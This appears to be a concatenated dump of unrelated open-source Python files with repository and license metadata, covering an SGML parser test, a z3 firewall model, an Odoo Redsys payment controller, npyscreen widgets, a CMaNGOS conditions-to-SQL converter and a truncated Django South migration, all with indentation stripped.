pass
# Example -- handle comment, could be overridden
def handle_comment(self, data):
pass
# Example -- handle declaration, could be overridden
def handle_decl(self, decl):
pass
# Example -- handle processing instruction, could be overridden
def handle_pi(self, data):
pass
# To be overridden -- handlers for unknown objects
def unknown_starttag(self, tag, attrs): pass
def unknown_endtag(self, tag): pass
def unknown_charref(self, ref): pass
def unknown_entityref(self, ref): pass
class TestSGMLParser(SGMLParser):
def __init__(self, verbose=0):
self.testdata = ""
SGMLParser.__init__(self, verbose)
def handle_data(self, data):
self.testdata = self.testdata + data
if len(repr(self.testdata)) >= 70:
self.flush()
def flush(self):
data = self.testdata
if data:
self.testdata = ""
print 'data:', repr(data)
def handle_comment(self, data):
self.flush()
r = repr(data)
if len(r) > 68:
r = r[:32] + '...' + r[-32:]
print 'comment:', r
def unknown_starttag(self, tag, attrs):
self.flush()
if not attrs:
print 'start tag: <' + tag + '>'
else:
print 'start tag: <' + tag,
for name, value in attrs:
print name + '=' + '"' + value + '"',
print '>'
def unknown_endtag(self, tag):
self.flush()
print 'end tag: </' + tag + '>'
def unknown_entityref(self, ref):
self.flush()
print '*** unknown entity ref: &' + ref + ';'
def unknown_charref(self, ref):
self.flush()
print '*** unknown char ref: &#' + ref + ';'
def unknown_decl(self, data):
self.flush()
print '*** unknown decl: [' + data + ']'
def close(self):
SGMLParser.close(self)
self.flush()
def test(args = None):
import sys
if args is None:
args = sys.argv[1:]
if args and args[0] == '-s':
args = args[1:]
klass = SGMLParser
else:
klass = TestSGMLParser
if args:
file = args[0]
else:
file = 'test.html'
if file == '-':
f = sys.stdin
else:
try:
f = open(file, 'r')
except IOError, msg:
print file, ":", msg
sys.exit(1)
data = f.read()
if f is not sys.stdin:
f.close()
x = klass()
for c in data:
x.feed(c)
x.close()
if __name__ == '__main__':
test()
|
gpl-3.0
|
apanda/modeling
|
mcnet/components/aclfirewall.py
|
1
|
2245
|
from . import NetworkObject
import z3
class AclFirewall (NetworkObject):
def _init(self, node, network, context):
super(AclFirewall, self).init_fail(node)
self.fw = node.z3Node
self.ctx = context
self.constraints = list ()
self.acls = list ()
network.SaneSend (self)
self._firewallSendRules ()
@property
def z3Node (self):
return self.fw
def SetPolicy (self, policy):
"""Wrap add acls"""
self.AddAcls(policy)
def AddAcls(self, acls):
if not isinstance(acls, list):
acls = [acls]
self.acls.extend(acls)
@property
def ACLs(self):
return self.acls
def _addConstraints(self, solver):
solver.add(self.constraints)
self._aclConstraints(solver)
def _firewallSendRules(self):
p_0 = z3.Const('%s_firewall_send_p_0'%(self.fw), self.ctx.packet)
n_0 = z3.Const('%s_firewall_send_n_0'%(self.fw), self.ctx.node)
n_1 = z3.Const('%s_firewall_send_n_1'%(self.fw), self.ctx.node)
t_0 = z3.Int('%s_firewall_send_t_0'%(self.fw))
t_1 = z3.Int('%s_firewall_send_t_1'%(self.fw))
self.acl_func = z3.Function('%s_acl_func'%(self.fw), self.ctx.address, self.ctx.address, z3.BoolSort())
self.constraints.append(z3.ForAll([n_0, p_0, t_0],
z3.Implies(self.ctx.send(self.fw, n_0, p_0, t_0), \
z3.Exists([t_1], \
z3.And(t_1 < t_0, \
z3.Not(self.failed(t_1)), \
z3.Not(self.failed(t_0)), \
z3.Exists([n_1], \
self.ctx.recv(n_1, self.fw, p_0, t_1)), \
z3.Not(self.acl_func(self.ctx.packet.src(p_0), self.ctx.packet.dest(p_0))))))))
def _aclConstraints(self, solver):
if len(self.acls) == 0:
return
a_0 = z3.Const('%s_firewall_acl_a_0'%(self.fw), self.ctx.address)
a_1 = z3.Const('%s_firewall_acl_a_1'%(self.fw), self.ctx.address)
acl_map = map(lambda (a, b): z3.Or(z3.And(a_0 == a, a_1 == b), z3.And(a_0 == b, a_1 == a)), self.acls)
solver.add(z3.ForAll([a_0, a_1], self.acl_func(a_0, a_1) == z3.Or(acl_map)))
|
bsd-3-clause
|
Endika/l10n-spain
|
payment_redsys/controllers/main.py
|
8
|
2358
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
from openerp.addons.website_sale.controllers.main import website_sale
_logger = logging.getLogger(__name__)
class RedsysController(http.Controller):
_return_url = '/payment/redsys/return'
_cancel_url = '/payment/redsys/cancel'
_exception_url = '/payment/redsys/error'
_reject_url = '/payment/redsys/reject'
@http.route([
'/payment/redsys/return',
'/payment/redsys/cancel',
'/payment/redsys/error',
'/payment/redsys/reject',
], type='http', auth='none')
def redsys_return(self, **post):
""" Redsys."""
_logger.info('Redsys: entering form_feedback with post data %s',
pprint.pformat(post))
if post:
request.registry['payment.transaction'].form_feedback(
request.cr, SUPERUSER_ID, post, 'redsys',
context=request.context)
return_url = post.pop('return_url', '')
if not return_url:
return_url = '/shop'
return werkzeug.utils.redirect(return_url)
@http.route(
['/payment/redsys/result/<page>'], type='http', auth='public',
methods=['GET'], website=True)
def redsys_result(self, page, **vals):
try:
sale_order_id = request.session.get('sale_last_order_id')
sale_obj = request.env['sale.order']
order = sale_obj.sudo().browse(sale_order_id)
res = {
'order': order,
}
return request.render('payment_redsys.%s' % str(page), res)
except:
return request.render('website.404')
class WebsiteSale(website_sale):
@http.route(['/shop/payment/transaction/<int:acquirer_id>'], type='json',
auth="public", website=True)
def payment_transaction(self, acquirer_id):
tx_id = super(WebsiteSale, self).payment_transaction(acquirer_id)
cr, context = request.cr, request.context
acquirer_obj = request.registry.get('payment.acquirer')
acquirer = acquirer_obj.browse(
cr, SUPERUSER_ID, acquirer_id, context=context)
if acquirer.provider == 'redsys':
request.website.sale_reset(context=request.context)
return tx_id
|
agpl-3.0
|
marcoapintoo/pypro
|
lib/npyscreen/fmFormMuttActive.py
|
15
|
8938
|
import weakref
import re
import curses
import collections
from . import fmFormMutt
from . import fmFormWithMenus
from . import npysNPSFilteredData
from . import wgtextbox
# This file defines Action Controllers
# and Widgets
# and Forms
##########################################################################################
# Action Controllers
##########################################################################################
class ActionControllerSimple(object):
def __init__(self, parent=None):
try:
self.parent = weakref.proxy(parent)
except:
self.parent = parent
self._action_list = []
self.create()
def create(self):
pass
def add_action(self, ident, function, live):
ident = re.compile(ident)
self._action_list.append({'identifier': ident,
'function': function,
'live': live
})
def process_command_live(self, command_line, control_widget_proxy):
for a in self._action_list:
if a['identifier'].match(command_line) and a['live']==True:
a['function'](command_line, control_widget_proxy, live=True)
def process_command_complete(self, command_line, control_widget_proxy):
for a in self._action_list:
if a['identifier'].match(command_line):
a['function'](command_line, control_widget_proxy, live=False)
##########################################################################################
# Widgets
##########################################################################################
class TextCommandBox(wgtextbox.Textfield):
def __init__(self, screen,
history=False,
history_max=100,
set_up_history_keys=False,
*args, **keywords):
super(TextCommandBox, self).__init__(screen, *args, **keywords)
self.history = history
self._history_store = collections.deque(maxlen=history_max)
self._current_history_index = False
self._current_command = None
if set_up_history_keys:
self.set_up_history_keys()
# History functions currently not complete.
def set_up_handlers(self):
super(TextCommandBox, self).set_up_handlers()
self.handlers.update({
curses.ascii.NL: self.h_execute_command,
curses.ascii.CR: self.h_execute_command,
})
def set_up_history_keys(self):
self.handlers.update({
"^P": self.h_get_previous_history,
"^N": self.h_get_next_history,
curses.KEY_UP: self.h_get_previous_history,
curses.KEY_DOWN: self.h_get_next_history,
})
def h_get_previous_history(self, ch):
if self._current_history_index is False:
self._current_command = self.value
_current_history_index = -1
else:
_current_history_index = self._current_history_index - 1
try:
self.value = self._history_store[_current_history_index]
except IndexError:
return True
self.cursor_position = len(self.value)
self._current_history_index = _current_history_index
self.display()
def h_get_next_history(self, ch):
if self._current_history_index is False:
return True
elif self._current_history_index == -1:
self.value = self._current_command
self._current_history_index = False
self.cursor_position = len(self.value)
self.display()
return True
else:
_current_history_index = self._current_history_index + 1
try:
self.value = self._history_store[_current_history_index]
except IndexError:
return True
self.cursor_position = len(self.value)
self._current_history_index = _current_history_index
self.display()
def h_execute_command(self, *args, **keywords):
if self.history:
self._history_store.append(self.value)
self._current_history_index = False
self.parent.action_controller.process_command_complete(self.value, weakref.proxy(self))
self.value = ''
def when_value_edited(self):
super(TextCommandBox, self).when_value_edited()
if self.editing:
self.parent.action_controller.process_command_live(self.value, weakref.proxy(self))
else:
self.parent.action_controller.process_command_complete(self.value, weakref.proxy(self))
class TextCommandBoxTraditional(TextCommandBox):
# EXPERIMENTAL
# WILL PASS INPUT TO A LINKED WIDGET - THE LINKED WIDGET
# UNLESS PUT IN TO COMMAND LINE MODE BY THE ENTRY OF BEGINNING_OF_COMMAND_LINE_CHARS
# WILL NEED TO BE ALTERED TO LOOK AS IF IT IS BEING EDITED TOO.
BEGINNING_OF_COMMAND_LINE_CHARS = (":", "/")
def __init__(self, screen,
history=True,
history_max=100,
set_up_history_keys=True,
*args, **keywords):
super(TextCommandBoxTraditional, self).__init__(screen,
history=history,
history_max=history_max,
set_up_history_keys=set_up_history_keys,
*args, **keywords
)
self.linked_widget = None
self.always_pass_to_linked_widget = []
def handle_input(self, inputch):
try:
inputchstr = chr(inputch)
except:
inputchstr = False
try:
input_unctrl = curses.ascii.unctrl(inputch)
except TypeError:
input_unctrl = False
if not self.linked_widget:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
if (inputch in self.always_pass_to_linked_widget) or \
(inputchstr in self.always_pass_to_linked_widget) or \
(input_unctrl in self.always_pass_to_linked_widget):
rtn = self.linked_widget.handle_input(inputch)
self.linked_widget.update()
return rtn
if inputchstr and (self.value == '' or self.value == None):
if inputchstr in self.BEGINNING_OF_COMMAND_LINE_CHARS or \
inputch in self.BEGINNING_OF_COMMAND_LINE_CHARS:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
if self.value:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
rtn = self.linked_widget.handle_input(inputch)
self.linked_widget.update()
return rtn
##########################################################################################
# Form Classes
##########################################################################################
class FormMuttActive(fmFormMutt.FormMutt):
DATA_CONTROLER = npysNPSFilteredData.NPSFilteredDataList
ACTION_CONTROLLER = ActionControllerSimple
COMMAND_WIDGET_CLASS = TextCommandBox
def __init__(self, *args, **keywords):
# first create action_controller, so that the create methods
# of forms can use it.
self.action_controller = self.ACTION_CONTROLLER(parent=self)
# then call the superclass init method.
super(FormMuttActive, self).__init__(*args, **keywords)
self.set_value(self.DATA_CONTROLER())
class FormMuttActiveWithMenus(FormMuttActive, fmFormWithMenus.FormBaseNewWithMenus):
def __init__(self, *args, **keywords):
super(FormMuttActiveWithMenus, self).__init__(*args, **keywords)
self.initialize_menus()
class FormMuttActiveTraditional(fmFormMutt.FormMutt):
DATA_CONTROLER = npysNPSFilteredData.NPSFilteredDataList
ACTION_CONTROLLER = ActionControllerSimple
COMMAND_WIDGET_CLASS = TextCommandBoxTraditional
def __init__(self, *args, **keywords):
# First create action_controller so that create methods of forms
# can use it.
self.action_controller = self.ACTION_CONTROLLER(parent=self)
super(FormMuttActiveTraditional, self).__init__(*args, **keywords)
self.set_value(self.DATA_CONTROLER())
self.wCommand.linked_widget = self.wMain
self.wMain.editable = False
self.wMain.always_show_cursor = True
# special mouse handling
self.wMain.interested_in_mouse_even_when_not_editable = True
class FormMuttActiveTraditionalWithMenus(FormMuttActiveTraditional,
fmFormWithMenus.FormBaseNewWithMenus):
def __init__(self, *args, **keywords):
super(FormMuttActiveTraditionalWithMenus, self).__init__(*args, **keywords)
self.initialize_menus()
|
mit
|
mynew1/mangos-classic
|
contrib/convertConditions/ConvertConditions.py
|
91
|
13340
|
#
# This file is part of the CMaNGOS Project. See AUTHORS file for Copyright information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import MySQLdb as mdb
import sys
#global Variables (change as required)
host = "localhost"
user = "mangos"
passw = "mangos"
# databases format: list of [name, expansion]
databases = [ ["mangos", 2] ]
#databases = [ ["zero_db", 0], ["tbcdb", 1], ["udb_clean", 2], ["ytdb", 2] ]
# Should the current conditions table be loaded? (usefull for appending custom content)
loadOldConditions = 0
# database, from which the conditions table will be loaded
database = databases[0][0]
#database = "mangos_custom"
# be very chatty with debug output
debug = 0
# global variables for internal use
false = 0
true = 1
processNumConditions = 0
fUpdates = 0
# Some Helper functions, main code at the bottom
def isSameCondition(c1, v11, v12, c2, v21, v22):
return (c1 == c2) and (v11 == v21) and (v12 == v22)
#
def compareCondition(c1, v11, v12, c2, v21, v22):
if (c1 > c2):
return true
if (c1 == c2):
if (v11 > v21):
return true
if (v11 == v21):
if (v12 > v22):
return true
return false
#
def insertCondition(c, v1, v2):
global old_max
old_max = old_max + 1
linkedList.append( [old_max, c, v1, v2, database] )
if (debug):
print "Inserted: [%d, %d, %d, %d], (%s)" % (old_max, c, v1, v2, database)
#
def findCondition(c, v1, v2):
for entry in linkedList:
if (isSameCondition(c, v1, v2, entry[1], entry[2], entry[3])):
return entry[0]
return 0
#
# Function that processes table tableName for keys keyName1, keyName2, parses the conditions of conditionString, which must select numberOfConditions conditions
def progressTable(tableName, keyName1, keyName2, conditionString, numberOfConditions):
global old_max
global processNumConditions
global fUpdates
try:
con = mdb.connect(host, user, passw, database);
cur = con.cursor()
cur.execute('SELECT %s, %s, %s FROM %s; ' % (keyName1, keyName2, conditionString, tableName))
result = cur.fetchall()
if (debug):
print 'ProgressTable %s in database %s' % (tableName, database)
for row in result:
key1 = row[0]
key2 = row[1]
c1 = v11 = v12 = c2 = v21 = v22 = c3= v31 =v32 = 0
c1 = row[2]
v11 = row[3]
v12 = row[4]
if (numberOfConditions >= 2):
c2 = row[5]
v21 = row[6]
v22 = row[7]
if (numberOfConditions >= 3):
c3 = row[8]
v31 = row[9]
v32 = row[10]
# Order the conditions of one row from big to slow
if (numberOfConditions >= 2) and (compareCondition(c2, v21, v22, c1, v11, v12)):
c1, v11, v12, c2, v21, v22 = c2, v21, v22, c1, v11, v12
if (numberOfConditions >= 3):
if (compareCondition(c3, v31, v32, c2, v21, v22)):
c2, v21, v22, c3, v31, v32 = c3, v31, v32, c2, v21, v22
if (compareCondition(c2, v21, v22, c1, v11, v12)):
c1, v11, v12, c2, v21, v22 = c2, v21, v22, c1, v11, v12
# How many conditions do we have?
rowConditionNumber = 0
if (c1 > 0):
rowConditionNumber = rowConditionNumber + 1
if (c2 > 0):
rowConditionNumber = rowConditionNumber + 1
if (c3 > 0):
rowConditionNumber = rowConditionNumber + 1
if (rowConditionNumber == 0): #nothing to do
continue;
if (debug):
print "Condition(s) for Key (%d, %d): %d, %d, %d -- %d, %d, %d -- %d, %d, %d" % (key1, key2, c1, v11, v12, c2, v21, v22, c3, v31, v32)
# Just insert
if (processNumConditions == 0):
if (rowConditionNumber >= 1 and findCondition(c1, v11, v12) == 0):
insertCondition(c1, v11, v12)
if (rowConditionNumber >= 2 and findCondition(c2, v21, v22) == 0):
insertCondition(c2, v21, v22)
if (rowConditionNumber >= 3 and findCondition(c3, v31, v32) == 0):
insertCondition(c3, v31, v32)
continue
#
# Currently processing?
if (processNumConditions != rowConditionNumber):
continue
founds = [0, 0, 0]
countFound = 0 # helper for error
if (rowConditionNumber >= 1):
founds[0] = findCondition(c1, v11, v12)
if (founds[0] > 0):
countFound = countFound + 1
if (rowConditionNumber >= 2):
founds[1] = findCondition(c2, v21, v22)
if (founds[1] > 0):
countFound = countFound + 1
if (rowConditionNumber >= 3):
founds[2] = findCondition(c3, v31, v32)
if (founds[2] > 0):
countFound = countFound + 1
if (countFound != rowConditionNumber):
print 'An error happened for: Condition(s) for Key (%d, %d): %d, %d, %d -- %d, %d, %d -- %d, %d, %d' % (key1, key2, c1, v11, v12, c2, v21, v22, c3, v31, v32)
continue
last_point = 0
#3-vector condition
if (rowConditionNumber == 3):
# search for 2 match
notSearched = [0, 0, 0]
notSearched[2] = findCondition(-1, founds[0], founds[1])
if (notSearched[2] == 0):
notSearched[2] = findCondition(-1, founds[1], founds[0])
notSearched[1] = findCondition(-1, founds[0], founds[2])
if (notSearched[1] == 0):
notSearched[1] = findCondition(-1, founds[2], founds[0])
notSearched[0] = findCondition(-1, founds[1], founds[2])
if (notSearched[0] == 0):
notSearched[0] = findCondition(-1, founds[2], founds[1])
if (notSearched == [0, 0, 0]): # nothing found
insertCondition(-1, founds[1], founds[2])
notSearched[0] = old_max
for i in range(0, 3):
if (notSearched[i] > 0):
last_point = findCondition(-1, notSearched[i], founds[i])
if (last_point == 0):
last_point = findCondition(-1, founds[i], notSearched[i])
if (last_point > 0):
break
if (last_point == 0):
for i in range(0, 3):
if (notSearched[i] > 0):
insertCondition(-1, founds[i], notSearched[i])
last_point = old_max
break
#2-vector condition
if (rowConditionNumber == 2):
# search for 2 match
last_point = findCondition(-1, founds[1], founds[0])
if (last_point == 0):
last_point = findCondition(-1, founds[0], founds[1])
if (last_point == 0):
#Not found, insert list
insertCondition(-1, founds[1], founds[0])
last_point = old_max
#1-vector condition
if (rowConditionNumber == 1):
last_point = founds[0]
# Now we must have last_point > 0 (for a condition), and linking to proper place
if (last_point > 0 and processNumConditions > 0):
#cur.execute('UPDATE %s SET condition_id=%d WHERE %s=%d AND %s=%d; ' % (tableName, last_point, keyName1, key1, keyName2, key2))
print >> fUpdates, 'UPDATE %s SET condition_id=%d WHERE %s=%d AND %s=%d;' % (tableName, last_point, keyName1, key1, keyName2, key2)
except mdb.Error, e:
print 'Error %d, %s' % (e.args[0], e.args[1])
sys.exit(1)
finally:
if con:
con.close()
## End of Helper function
linkedList = []
old_max = 0
linkedList.append( [0, 0, 0, 0, 'initial fill'] )
# Extract old conditions
if (loadOldConditions):
try:
con = mdb.connect(host, user, passw, database);
cur = con.cursor()
cur.execute('SELECT condition_entry, type, value1, value2 FROM conditions')
for row in cur:
linkedList.append( [row[0], row[1], row[2], row[3], 'reloaded from %s' % database ] )
old_max = old_max + 1
if (row[0] != old_max):
print 'An error happened at old_max=%d, entry=%d' % (old_max, row[0])
print 'Loaded %d values from %s conditions table' % (old_max, database)
except mdb.Error, e:
print 'Error %d, %s' % (e.args[0], e.args[1])
sys.exit(1)
finally:
if con:
con.close()
#
start_entry=old_max
def doTables(db):
global processNumConditions
global fUpdates
global database
database = db[0]
print 'Processing database %s (%d vector conditions)' % (database, processNumConditions)
try:
if (processNumConditions == 0):
fUpdates = open("%s_updates.sql" % database, "w")
else:
fUpdates = open("%s_updates.sql" % database, "a")
if (processNumConditions <= 1):
progressTable("reference_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("creature_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("gameobject_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("pickpocketing_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("item_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("fishing_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("skinning_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("disenchant_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("mail_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
# Not all expansions have all tables
if (db[1] >= 1):
progressTable("prospecting_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
if (db[1] >= 2):
progressTable("spell_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("milling_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
if (processNumConditions < 3):
progressTable("gossip_menu", "entry", "text_id", "cond_1, cond_1_val_1, cond_1_val_2, cond_2, cond_2_val_1, cond_2_val_2", 2)
progressTable("gossip_menu_option", "menu_id", "id", "cond_1, cond_1_val_1, cond_1_val_2, cond_2, cond_2_val_1, cond_2_val_2, cond_3, cond_3_val_1, cond_3_val_2", 3)
except:
print "An error happened here"
sys.exit(1)
finally:
fUpdates.close()
# end of helper function doTables
try:
fConditions = open("conditions_dump.sql", "w")
if (debug):
print 'Opened conditions_dump.sql successfully'
for i in range (0, 4):
processNumConditions = i
for db in databases:
doTables(db)
print 'Inserted %d rows for database %s' % (old_max - start_entry, database)
start_entry = old_max
print 'Processed database(s): %s' % databases
#create dump
print >> fConditions, 'TRUNCATE conditions;'
print >> fConditions, 'INSERT INTO conditions VALUES'
for i in range(1, old_max):
if (linkedList[i][0] != i):
print 'AN ERROR HAPPENED for i=%d, liLi[i].entry=%d' % (i, linkedList[i][0])
print >> fConditions, '(%d, %d, %d, %d), -- %s' % (linkedList[i][0], linkedList[i][1], linkedList[i][2], linkedList[i][3], linkedList[i][4])
i = old_max
print >> fConditions, '(%d, %d, %d, %d); -- %s' % (linkedList[i][0], linkedList[i][1], linkedList[i][2], linkedList[i][3], linkedList[i][4])
except:
print "An error happened"
sys.exit(1)
finally:
fConditions.close()
|
gpl-2.0
|
ISIFoundation/influenzanet-website
|
apps/survey/migrations/0010_auto__del_extraresponse.py
|
4
|
12336
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
if raw_input("""Do you want to remove the table for survey.ExtraResponse?
This was at some point added for the British site as a hack, and is now no longer supported.
If the table contains valuable data, or you're not sure, you'll probably want to answer "No" to this question. [y/N] """).lower().startswith('y'):
print "Deleting model 'ExtraResponse'"
db.delete_table('survey_extraresponse')
def backwards(self, orm):
# Adding model 'ExtraResponse'
db.create_table('survey_extraresponse', (
('data', self.gf('django.db.models.fields.TextField')(default=None, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('participation', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['survey.Participation'], null=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['survey.SurveyUser'])),
))
db.send_create_signal('survey', ['ExtraResponse'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'survey.lastresponse': {
'Meta': {'object_name': 'LastResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'})
},
'survey.localflusurvey': {
'Meta': {'object_name': 'LocalFluSurvey'},
'age_user': ('django.db.models.fields.SmallIntegerField', [], {}),
'data': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '8'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.localprofile': {
'Meta': {'object_name': 'LocalProfile'},
'a_family': ('django.db.models.fields.SmallIntegerField', [], {}),
'a_smoker': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_current': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_seasonal': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'a_vaccine_prev_swine': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'birth_date': ('django.db.models.fields.DateField', [], {}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True'}),
'sq_date_first': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_date_last': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'sq_num_season': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'sq_num_total': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True'}),
'surveyuser': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'zip_code': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
'survey.localresponse': {
'Meta': {'object_name': 'LocalResponse'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.participation': {
'Meta': {'object_name': 'Participation'},
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'epidb_id': ('django.db.models.fields.CharField', [], {'max_length': '36', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'previous_participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']", 'null': 'True'}),
'previous_participation_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Survey']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"})
},
'survey.profile': {
'Meta': {'object_name': 'Profile'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'survey': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Survey']", 'null': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'survey.profilesendqueue': {
'Meta': {'object_name': 'ProfileSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.responsesendqueue': {
'Meta': {'object_name': 'ResponseSendQueue'},
'answers': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.Participation']"}),
'survey_id': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '36'})
},
'survey.survey': {
'Meta': {'object_name': 'Survey'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
